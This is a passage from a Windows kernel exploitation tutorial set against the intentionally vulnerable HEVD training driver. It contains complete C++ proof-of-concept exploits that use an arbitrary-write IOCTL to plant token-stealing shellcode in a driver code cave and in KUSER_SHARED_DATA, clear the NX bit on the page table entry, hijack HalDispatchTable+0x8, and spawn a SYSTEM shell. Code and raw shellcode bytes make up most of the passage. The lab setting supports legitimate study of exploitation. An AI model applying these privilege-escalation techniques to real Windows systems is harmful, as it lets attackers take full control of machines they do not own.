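To illustrate the NX manipulation, the sketch below clears only bit 63 and compares that with a broader mask that wipes the top four bits. The PTE values are invented for the example, and ClearNoExecute / ClearTopNibble are hypothetical helper names.

```cpp
#include <cassert>
#include <cstdint>

// Bit 63 of an x64 PTE is NX (no-execute).
constexpr uint64_t kPteNoExecuteBit = 1ULL << 63;

// Clears only NX and leaves every other bit untouched.
constexpr uint64_t ClearNoExecute(uint64_t pte) {
    return pte & ~kPteNoExecuteBit;
}

// Broader mask: clears bits 60-63, so it also drops bits 60-62 if any are set.
constexpr uint64_t ClearTopNibble(uint64_t pte) {
    return pte & 0x0FFFFFFFFFFFFFFFULL;
}

// Made-up PTE with only NX set in the top nibble: both masks agree.
static_assert(ClearNoExecute(0x8A00000012345863ULL) == ClearTopNibble(0x8A00000012345863ULL),
              "identical when bits 60-62 are clear");
```

The two masks differ only when one of bits 60 to 62 is set, so the single-bit mask is the more conservative choice if the goal is to change nothing but executability.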
uintptr_t modifiedPFN = (uintptr_t)*pfn & 0x0FFFFFFFFFFFFFFF;
printf("[+] Modified PFN of shellcode with \"E\" flag: %p\n", modifiedPFN);
input.WHAT = (LPVOID)(&modifiedPFN);
input.WHERE = (LPVOID)(actualPTE);
printf("[+] Calling TriggerArbitraryWrite....");
success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
The write succeeded, and we can see the “E” flag on our kernel-space shellcode address.
Step 5: Overwriting HalDispatchTable+0x8
- This step is also the same as what we did in “Method (1)”: we simply overwrite the pointer at HalDispatchTable+0x8 with our kernel-space shellcode address (kernelShellcode).
input.WHAT = (LPVOID)(&kernelShellcode);
input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8);
printf("[+] Overwriting HalDispatchTable+0x8 with: %p\n", kernelShellcode);
printf("[+] Calling TriggerArbitraryWrite (4)....");
success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
The write to HalDispatchTable+0x8 succeeded. Checking the HalDispatchTable, the second pointer is overwritten with our kernel shellcode address as well.
Step 6: Triggering NtQueryIntervalProfile()
- This is also the same step: we execute NtQueryIntervalProfile() and trigger the call through HalDispatchTable+0x8.
pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(
GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile) {
printf("[-] Unable to find ntdll!NtQueryIntervalProfile\n");
return 1;
}
printf("[+] Found ntdll!NtQueryIntervalProfile\n");
printf("[+] Calling nt!NtQueryIntervalProfile to execute nt!HalDispatchTable+0x8...\n");
ULONG x = 0;
NtQueryIntervalProfile(
0x1337,
&x
);
printf("[+] Spawning a shell with elevated privileges\n\n");
system("cmd");
Placed some breakpoints on the API calls and executed the code. The first breakpoint hit on NtQueryIntervalProfile; I continued and hit the second breakpoint on KeQueryIntervalProfile. Let’s walk through this call once again.
The nt!HalDispatchTable+0x8 pointer is moved to RAX (1️⃣), and we can confirm that the address is our kernel-space shellcode address (2️⃣). Moving on to nt!guard_dispatch_icall (3️⃣), let’s step into this call.
Now that we have stepped inside nt!guard_dispatch_icall (1️⃣), it executes test rax, rax (2️⃣) to set the sign flag (SF), and after the instruction we can confirm that SF is “1”. So it didn’t take the jump.
Moving down the road, it makes an indirect jmp to the address in RAX, which is our shellcode address.
And it executed our shellcode, and we got a shell as “SYSTEM”.
Full POC:
// whatwhere.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <psapi.h>
#include <cstdint>
#include <cstring>

#define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS)

typedef struct _WRITE_WHAT_WHERE {
    void* WHAT;
    void* WHERE;
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;

typedef NTSTATUS(WINAPI* pNtQueryIntervalProfile)(IN ULONG ProfileSource, OUT PULONG Interval);

PVOID getbaseaddress(LPCWSTR name)
{
    LPVOID* pImageBase;
    DWORD ImageSize = 0;
    WCHAR driverName[1024];
    LPVOID driverBase = nullptr;

    EnumDeviceDrivers(nullptr, 0, &ImageSize);
    pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (!pImageBase || !EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize)) {
        return nullptr;
    }

    int driver_count = ImageSize / sizeof(pImageBase[0]);
    for (int i = 0; i < driver_count; i++) {
        // The size argument is a count of characters (WCHARs), not bytes
        GetDeviceDriverBaseNameW(pImageBase[i], driverName, sizeof(driverName) / sizeof(driverName[0]));
        if (!wcscmp(name, driverName)) {
            driverBase = pImageBase[i];
            break;
        }
    }
    return driverBase;
}

uintptr_t MiGetPte(LPVOID lpMemory)
{
    uintptr_t addr = reinterpret_cast<uintptr_t>(lpMemory);
    uintptr_t calc1 = addr >> 9;            // shr rcx, 9
    uintptr_t calc2 = calc1 & 0x7FFFFFFFF8; // and rax, rcx
    return calc2;
}

int main()
{
    WRITE_WHAT_WHERE input;
    BOOL success; // DeviceIoControl returns BOOL, not NTSTATUS

    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);
    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Failed to open handle: %lu\n", GetLastError());
        return 1;
    }

    LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
    printf("[+] Nt base address: %p\n", nt_addr);
    LPVOID hevd_addr = getbaseaddress(L"HEVD.sys");
    printf("[+] HEVD base address: %p\n", hevd_addr);

    LPVOID shellcode_start = (LPVOID)((uintptr_t)hevd_addr + 0x3000 + 0x20);
    LPVOID kernelShellcode = (LPVOID)((uintptr_t)hevd_addr + 0x3000 + 0x20);
    printf("[+] Address of Shellcode in kernel space: %p\n", shellcode_start);

    // Step 2
    BYTE shellcode[] = {
        0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
        0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x49, 0x89,
        0xC0, 0x4D, 0x8B, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49,
        0x81, 0xE8, 0x48, 0x04, 0x00, 0x00, 0x4D, 0x8B, 0x88,
        0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xF9, 0x04, 0x75,
        0xE5, 0x49, 0x8B, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x80,
        0xE1, 0xF0, 0x48, 0x89, 0x88, 0xB8, 0x04, 0x00, 0x00,
        0x31, 0xC0, 0xC3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
    };
    size_t size = sizeof(shellcode);
    size_t num_chunks = size / 8;
    uint64_t* chunks = new uint64_t[num_chunks];
    for (size_t i = 0; i < num_chunks; i++) {
        std::memcpy(&chunks[i], &shellcode[i * 8], 8);
        input.WHAT = (LPVOID)(&chunks[i]);
        input.WHERE = (LPVOID)(shellcode_start);
        printf("[+] Calling TriggerArbitraryWrite to Write Shellcode in 0x%p....", shellcode_start);
        success = DeviceIoControl(hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input),
                                  nullptr, 0, nullptr, nullptr);
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
        shellcode_start = (LPVOID)((uintptr_t)shellcode_start + 0x8);
    }
    delete[] chunks;
    getchar();

    LPVOID PteBase = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
    printf("[+] Allocated region to read MiGetPteAddress+0x13 Address: %p\n", PteBase);
    input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13);
    input.WHERE = (LPVOID)(PteBase);
    printf("[+] Calling TriggerArbitraryWrite....");
    success = DeviceIoControl(hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input),
                              nullptr, 0, nullptr, nullptr);
    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }
    LPVOID* basePTE = (LPVOID*)PteBase;
    printf("[+] Base address of PTE: %p\n", *basePTE);
    uintptr_t ShellcodePte = MiGetPte(kernelShellcode);
    uintptr_t actualPTE = (uintptr_t)*basePTE + ShellcodePte;
    printf("[+] PTE of shellcode address: %p\n", (void*)actualPTE);
    getchar();

    // Step 3
    LPVOID pfnShellcode = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
    printf("[+] Allocated region to read PFN of shellcode: %p\n", pfnShellcode);
    input.WHAT = (LPVOID)(actualPTE);
    input.WHERE = (LPVOID)(pfnShellcode);
    printf("[+] Calling TriggerArbitraryWrite....");
    success = DeviceIoControl(hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input),
                              nullptr, 0, nullptr, nullptr);
    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }
    LPVOID* pfn = (LPVOID*)pfnShellcode;
    printf("[+] PFN of shellcode address: %p\n", *pfn);
    getchar();

    // Step 4
    uintptr_t modifiedPFN = (uintptr_t)*pfn & 0x0FFFFFFFFFFFFFFF;
    printf("[+] Modified PFN of shellcode with \"E\" flag: %p\n", (void*)modifiedPFN);
    input.WHAT = (LPVOID)(&modifiedPFN);
    input.WHERE = (LPVOID)(actualPTE);
    printf("[+] Calling TriggerArbitraryWrite....");
    success = DeviceIoControl(hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input),
                              nullptr, 0, nullptr, nullptr);
    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }
    getchar();

    // Step 5
    input.WHAT = (LPVOID)(&kernelShellcode);
    input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8);
    printf("[+] Overwriting HalDispatchTable+0x8 with: %p\n", kernelShellcode);
    printf("[+] Calling TriggerArbitraryWrite....");
    success = DeviceIoControl(hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input),
                              nullptr, 0, nullptr, nullptr);
    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }
    getchar();

    // Step 6
    pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(
        GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");
    if (!NtQueryIntervalProfile) {
        printf("[-] Unable to find ntdll!NtQueryIntervalProfile\n");
        return 1;
    }
    printf("[+] Found ntdll!NtQueryIntervalProfile\n");
    printf("[+] Calling nt!NtQueryIntervalProfile to execute nt!HalDispatchTable+0x8...\n");
    ULONG x = 0;
    NtQueryIntervalProfile(
        0x1337,
        &x
    );
    printf("[+] Spawning a shell with elevated privileges\n\n");
    system("cmd");
    return 0;
}
Method (3) - KUSER_SHARED_DATA
Now that we know how to exploit this WRITE-WHAT-WHERE, there is one more common method: instead of writing into the driver’s code cave, we can use the KUSER_SHARED_DATA structure.
According to Microsoft: Source
The KUSER_SHARED_DATA structure has been abused in Windows kernel exploitation for a while now. As stated, its address is always static in both kernel and user space, and it also has READ and WRITE permissions. This was fixed after Windows 10 Insider Preview build 20246. However, my current Windows 10 Pro build 19045 (22H2), which is the latest version, does not seem to have the fix implemented yet.
Checking the static address (0xFFFFF78000000000), there is some data written here already; those are the values being used by the KUSER_SHARED_DATA structure itself.
Checking the structure size, it’s 0x720 bytes in total, and the Microsoft article mentions that a single page (4 KB) is allocated for it. That means 0x1000 - 0x720 = 0x8E0 bytes are available for our use.
Since we don’t want to touch the KUSER_SHARED_DATA structure itself, let’s leave that space alone and find a location for our shellcode. I decided to pick KUSER_SHARED_DATA + 0x800, and we can see it’s empty, so we have a static code cave. Checking the region, it has READ and WRITE but not EXECUTE permission, but that’s fine: utilizing WRITE-WHAT-WHERE, we can change that.
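The space calculation above can be double-checked with a few compile-time constants. This is only a sketch using the numbers from the text (4 KB page, 0x720-byte structure, cave at +0x800) and the 72-byte shellcode used in this post; the helper names `freeBytesAfterStruct` and `fitsInCave` are made up for illustration.

```cpp
#include <cstdint>

// Values taken from the text above.
constexpr std::uint64_t kPageSize   = 0x1000; // single 4 KB page
constexpr std::uint64_t kStructSize = 0x720;  // size of KUSER_SHARED_DATA on this build
constexpr std::uint64_t kCaveOffset = 0x800;  // offset chosen for the shellcode

// Bytes left in the page after the structure itself.
constexpr std::uint64_t freeBytesAfterStruct() {
    return kPageSize - kStructSize;
}

// True when `len` bytes placed at `offset` stay inside the page
// and do not overlap the structure (hypothetical helper).
constexpr bool fitsInCave(std::uint64_t offset, std::uint64_t len) {
    return offset >= kStructSize && offset + len <= kPageSize;
}

static_assert(freeBytesAfterStruct() == 0x8E0, "0x1000 - 0x720 = 0x8E0");
static_assert(fitsInCave(kCaveOffset, 72), "72-byte shellcode fits at +0x800");
```

If the structure size differs on another build, only `kStructSize` needs to change and the `static_assert` lines will flag an offset that no longer fits.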
Let’s give this a try. It’s going to be the same methodology as covered in “Method (2)” with one single change: instead of using the HEVD code cave address, we are going to replace it with the static KUSER_SHARED_DATA address.
- The shellcode_start and kernelShellcode values are changed to the KUSER_SHARED_DATA + 0x800 address.
int main()
{
WRITE_WHAT_WHERE input;
BOOL success; // DeviceIoControl returns BOOL, not NTSTATUS
printf("[+] Opening handle to driver\n");
HANDLE hDriver = CreateFileW(
L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
FILE_SHARE_WRITE,
nullptr,
OPEN_EXISTING,
0,
nullptr);
if (hDriver == INVALID_HANDLE_VALUE)
{
printf("[!] Failed to open handle: %d", GetLastError());
return 1;
}
LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
printf("[+] Nt base address: %p\n", nt_addr);
LPVOID shellcode_start = (LPVOID)(0xFFFFF78000000000 + 0x800); // KUSER_SHARED_DATA + 0x800
LPVOID kernelShellcode = (LPVOID)(0xFFFFF78000000000 + 0x800); // KUSER_SHARED_DATA + 0x800
printf("[+] Address of Shellcode in kernel space: %p\n", shellcode_start);
// Step 2
BYTE shellcode[] = {
0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x49, 0x89,
0xC0, 0x4D, 0x8B, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49,
0x81, 0xE8, 0x48, 0x04, 0x00, 0x00, 0x4D, 0x8B, 0x88,
0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xF9, 0x04, 0x75,
0xE5, 0x49, 0x8B, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x80,
0xE1, 0xF0, 0x48, 0x89, 0x88, 0xB8, 0x04, 0x00, 0x00,
0x31, 0xC0, 0xC3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};
size_t size = sizeof(shellcode);
size_t num_chunks = size / 8;
uint64_t* chunks = new uint64_t[num_chunks];
for (size_t i = 0; i < num_chunks; i++) {
std::memcpy(&chunks[i], &shellcode[i * 8], 8);
input.WHAT = (LPVOID)(&chunks[i]);
input.WHERE = (LPVOID)(shellcode_start);
printf("[+] Calling TriggerArbitraryWrite to Write Shellcode in 0x%p....", shellcode_start);
success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
shellcode_start = (LPVOID)((uintptr_t)shellcode_start + 0x8);
}
// [ The rest is the same as in Method (2) ]
}
I updated and executed the POC, and the shellcode was written to the KUSER_SHARED_DATA + 0x800 (0xFFFFF78000000800) address. I can confirm the same using WinDBG.
The next step is calculating the PTE address of KUSER_SHARED_DATA + 0x800 and reading its PTE bits/flags. The values retrieved are the same as those from the !pte command.
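To make the PTE calculation concrete, here is a small sketch that mirrors the MiGetPte() helper from the POC and applies it to KUSER_SHARED_DATA + 0x800. The PTE base used below is an assumption for illustration only (a fixed placeholder value); on the target the base is randomized and has to be leaked from MiGetPteAddress+0x13, as the POC does.

```cpp
#include <cstdint>

// Same arithmetic as MiGetPte() in the POC: shift right by 9, then mask
// so the result is an 8-byte-aligned offset into the PTE array.
constexpr std::uint64_t pteOffset(std::uint64_t va) {
    return (va >> 9) & 0x7FFFFFFFF8ULL;
}

// PTE address = leaked PTE base + offset.
constexpr std::uint64_t pteAddress(std::uint64_t pteBase, std::uint64_t va) {
    return pteBase + pteOffset(va);
}

constexpr std::uint64_t kShellcodeVa = 0xFFFFF78000000800ULL; // KUSER_SHARED_DATA + 0x800

// ASSUMPTION: placeholder PTE base, not a value read from the target machine.
constexpr std::uint64_t kExamplePteBase = 0xFFFFF68000000000ULL;

static_assert(pteOffset(kShellcodeVa) == 0x7BC0000000ULL, "offset into the PTE array");
static_assert(pteAddress(kExamplePteBase, kShellcodeVa) == 0xFFFFF6FBC0000000ULL,
              "placeholder base + offset");
```

Because the whole page shares one PTE, the offset is the same for KUSER_SHARED_DATA itself and for the +0x800 cave; the low 12 bits of the address do not survive the shift and mask.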
Modified the bits/flags and cleared the no eXecute bit on our shellcode region:
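The bit flip itself is a single mask operation. The sketch below compares clearing only bit 63 (the no-execute bit of an x64 PTE) with the 0x0FFFFFFFFFFFFFFF mask used in the POC, which also clears bits 60 to 62. The PTE value is made up for illustration and is not taken from the target.

```cpp
#include <cstdint>

constexpr std::uint64_t kNxBit = 1ULL << 63; // x64 PTE bit 63: no-execute

// Clear only the no-execute bit.
constexpr std::uint64_t clearNx(std::uint64_t pte) {
    return pte & ~kNxBit;
}

// Mask used in the POC: clears bits 60..63, which includes the NX bit.
constexpr std::uint64_t clearTopNibble(std::uint64_t pte) {
    return pte & 0x0FFFFFFFFFFFFFFFULL;
}

constexpr bool isExecutable(std::uint64_t pte) {
    return (pte & kNxBit) == 0;
}

// ASSUMPTION: hypothetical PTE value with NX set, for illustration only.
constexpr std::uint64_t kExamplePte = 0x8000000001234863ULL;

static_assert(!isExecutable(kExamplePte), "NX set before the write");
static_assert(isExecutable(clearNx(kExamplePte)), "NX cleared");
static_assert(clearNx(kExamplePte) == clearTopNibble(kExamplePte),
              "both masks agree when bits 60..62 are zero");
```

The two masks only differ when bits 60 to 62 of the PTE are set, so for a value like the one above either approach produces the same modified PTE.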
And the HalDispatchTable is also overwritten successfully:
Finally, by calling NtQueryIntervalProfile(), we got SYSTEM:
Even though everything seems fine, I sometimes get a CRITICAL_STRUCTURE_CORRUPTION BSOD after the SYSTEM shell is spawned. Maybe some check kicks in and finds that HalDispatchTable is modified, since we have not reverted it back to its original state yet.
To fix this, I added a step to copy the original value before overwriting nt!HalDispatchTable+0x8.
Basically, it’s a pointer to nt!HalpSetSystemInformation, and now we have a backup of this pointer.
After overwriting the pointer with our kernel-space shellcode address and executing it, we can restore it.
The NtQueryIntervalProfile() function will execute our shellcode, and then we revert nt!HalDispatchTable+0x8 before spawning a new cmd.exe.
Checking the HalDispatchTable again, it was reverted back.
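The backup, overwrite, trigger, restore sequence can be tried safely in user mode. The sketch below is not the driver: `writeWhatWhere` is a stand-in that copies 8 bytes from `*what` to `*where`, which is my assumption of how the primitive behaves based on the POC, and `hookCallRestore` is a hypothetical helper name.

```cpp
#include <cstdint>
#include <cstring>

// User-mode stand-in for the primitive: copy 8 bytes from *what to *where.
// ASSUMPTION: models only the data flow; the real copy happens inside HEVD.
inline void writeWhatWhere(const void* what, void* where) {
    std::memcpy(where, what, sizeof(std::uint64_t));
}

// Reading is the same primitive with the roles swapped: "what" is the
// address to read and "where" is a local buffer.
inline std::uint64_t readQword(const std::uint64_t* addr) {
    std::uint64_t out = 0;
    writeWhatWhere(addr, &out);
    return out;
}

// Save the slot, point it at `hook`, run `trigger`, then put the old value back.
// Returns the value that was saved.
template <typename Trigger>
std::uint64_t hookCallRestore(std::uint64_t* slot, std::uint64_t hook, Trigger trigger) {
    const std::uint64_t original = readQword(slot); // backup
    writeWhatWhere(&hook, slot);                    // overwrite
    trigger();                                      // NtQueryIntervalProfile() in the POC
    writeWhatWhere(&original, slot);                // restore
    return original;
}
```

Calling `hookCallRestore(&table[1], value, callback)` on a plain array shows the slot holding `value` while the callback runs and the original contents afterwards, which is the state we want HalDispatchTable+0x8 to end up in.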
Full POC:
#include <Windows.h>
#include <stdio.h>
#include <psapi.h>
#include <cstdint>
#include <cstring>

#define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS)

typedef struct _WRITE_WHAT_WHERE {
    void* WHAT;
    void* WHERE;
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;

typedef NTSTATUS(WINAPI* pNtQueryIntervalProfile)(IN ULONG ProfileSource, OUT PULONG Interval);

PVOID getbaseaddress(LPCWSTR name) {
    BOOL status;
    LPVOID* pImageBase;
    DWORD ImageSize;
    WCHAR driverName[1024];
    LPVOID driverBase = nullptr;
    status = EnumDeviceDrivers(nullptr, 0, &ImageSize);
    pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);
    int driver_count = ImageSize / sizeof(pImageBase[0]);
    for (int i = 0; i < driver_count; i++) {
        // The size argument is a character count, so divide by the WCHAR element size
        GetDeviceDriverBaseNameW(pImageBase[i], driverName, sizeof(driverName) / sizeof(driverName[0]));
        if (!wcscmp(name, driverName)) {
            driverBase = pImageBase[i];
            break;
        }
    }
    return driverBase;
}

uintptr_t MiGetPte(LPVOID lpMemory) {
    uintptr_t addr = reinterpret_cast<uintptr_t>(lpMemory);
    uintptr_t calc1 = addr >> 9;            // shr rcx, 9
    uintptr_t calc2 = calc1 & 0x7FFFFFFFF8; // and rax, rcx
    return calc2;
}

int main()
{
    WRITE_WHAT_WHERE input;
    BOOL success; // DeviceIoControl returns BOOL, not NTSTATUS
    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);
    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Failed to open handle: %d", GetLastError());
        return 1;
    }
    LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
    printf("[+] Nt base address: %p\n", nt_addr);
    LPVOID shellcode_start = (LPVOID)(0xFFFFF78000000000 + 0x800); // KUSER_SHARED_DATA + 0x800
    LPVOID kernelShellcode = (LPVOID)(0xFFFFF78000000000 + 0x800); // KUSER_SHARED_DATA + 0x800
    printf("[+] Address of Shellcode in kernel space: %p\n", shellcode_start);

    // Step 2
    BYTE shellcode[] = {
        0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
        0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x49, 0x89,
        0xC0, 0x4D, 0x8B, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49,
        0x81, 0xE8, 0x48, 0x04, 0x00, 0x00, 0x4D, 0x8B, 0x88,
        0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xF9, 0x04, 0x75,
        0xE5, 0x49, 0x8B, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x80,
        0xE1, 0xF0, 0x48, 0x89, 0x88, 0xB8, 0x04, 0x00, 0x00,
        0x31, 0xC0, 0xC3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
    };
    size_t size = sizeof(shellcode);
    size_t num_chunks = size / 8;
    uint64_t* chunks = new uint64_t[num_chunks];
    for (size_t i = 0; i < num_chunks; i++) {
        std::memcpy(&chunks[i], &shellcode[i * 8], 8);
        input.WHAT = (LPVOID)(&chunks[i]);
        input.WHERE = (LPVOID)(shellcode_start);
        printf("[+] Calling TriggerArbitraryWrite to Write Shellcode in 0x%p....", shellcode_start);
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr, 0, nullptr, nullptr);
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
        shellcode_start = (LPVOID)((uintptr_t)shellcode_start + 0x8);
    }
    delete[] chunks;
    getchar();

    // Step 3
    LPVOID PteBase = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
    printf("[+] Allocated region to read MiGetPteAddress+0x13 Address: %p\n", PteBase);
    input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13);
    input.WHERE = (LPVOID)(PteBase);
    printf("[+] Calling TriggerArbitraryWrite....");
    success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr, 0, nullptr, nullptr);
    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }
    LPVOID* basePTE = (LPVOID*)PteBase;
    printf("[+] Base address of PTE: %p\n", *basePTE);
    uintptr_t ShellcodePte = MiGetPte(kernelShellcode);
    uintptr_t actualPTE = (uintptr_t)*basePTE + ShellcodePte;
    printf("[+] PTE of shellcode address: %p\n", actualPTE);
    getchar();

    LPVOID pfnShellcode = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
    printf("[+] Allocated region to read PFN of shellcode: %p\n", pfnShellcode);
    input.WHAT = (LPVOID)(actualPTE);
    input.WHERE = (LPVOID)(pfnShellcode);
    printf("[+] Calling TriggerArbitraryWrite....");
    success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr, 0, nullptr, nullptr);
    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }
    LPVOID* pfn = (LPVOID*)pfnShellcode;
    printf("[+] PFN of shellcode address: %p\n", *pfn);
    getchar();

    // Step 4
    uintptr_t modifiedPFN = (uintptr_t)*pfn & 0x0FFFFFFFFFFFFFFF;
    printf("[+] Modified PFN of shellcode with \"E\" flag: %p\n", modifiedPFN);
    input.WHAT = (LPVOID)(&modifiedPFN);
    input.WHERE = (LPVOID)(actualPTE);
    printf("[+] Calling TriggerArbitraryWrite....");
    success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr, 0, nullptr, nullptr);
    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }
    getchar();

    // Step 5
    LPVOID halPointer = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
    printf("[+] Allocated region to read HalDispatchTable+0x8 pointer: %p\n", halPointer);
    input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8); // HalDispatchTable+0x8
    input.WHERE = (LPVOID)(halPointer);
    printf("[+] Calling TriggerArbitraryWrite....");
    success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr, 0, nullptr, nullptr);
    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }
    LPVOID* hal0x8 = (LPVOID*)halPointer;
    printf("[+] Original pointer stored in HalDispatchTable+0x8: %p\n", *hal0x8);
    getchar();

    // Step 6
    input.WHAT = (LPVOID)(&kernelShellcode);
    input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8); // HalDispatchTable+0x8
    printf("[+] Overwriting HalDispatchTable+0x8 with: %p\n", kernelShellcode);
    printf("[+] Calling TriggerArbitraryWrite....");
    success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr, 0, nullptr, nullptr);
    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }
    getchar();

    // Step 7
    pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(
        GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");
    if (!NtQueryIntervalProfile) {
        printf("[-] Unable to find ntdll!NtQueryIntervalProfile\n");
        return 1;
    }
    printf("[+] Found ntdll!NtQueryIntervalProfile\n");
    printf("[+] Calling nt!NtQueryIntervalProfile to execute nt!HalDispatchTable+0x8...\n");
    ULONG x = 0;
    NtQueryIntervalProfile(0x1337, &x);

    // Step 8
    printf("[+] Reverting HalDispatchTable+0x8 to its original state...\n");
    input.WHAT = (LPVOID)(hal0x8); // points at the saved original pointer
    input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8); // HalDispatchTable+0x8
    printf("[+] Calling TriggerArbitraryWrite....");
    success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr, 0, nullptr, nullptr);
    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }
    getchar();
    printf("[+] Spawning a shell with elevated privileges\n\n");
    system("cmd");
    return 0;
}
Method (4) - HVCI (Memory Integrity) Enabled
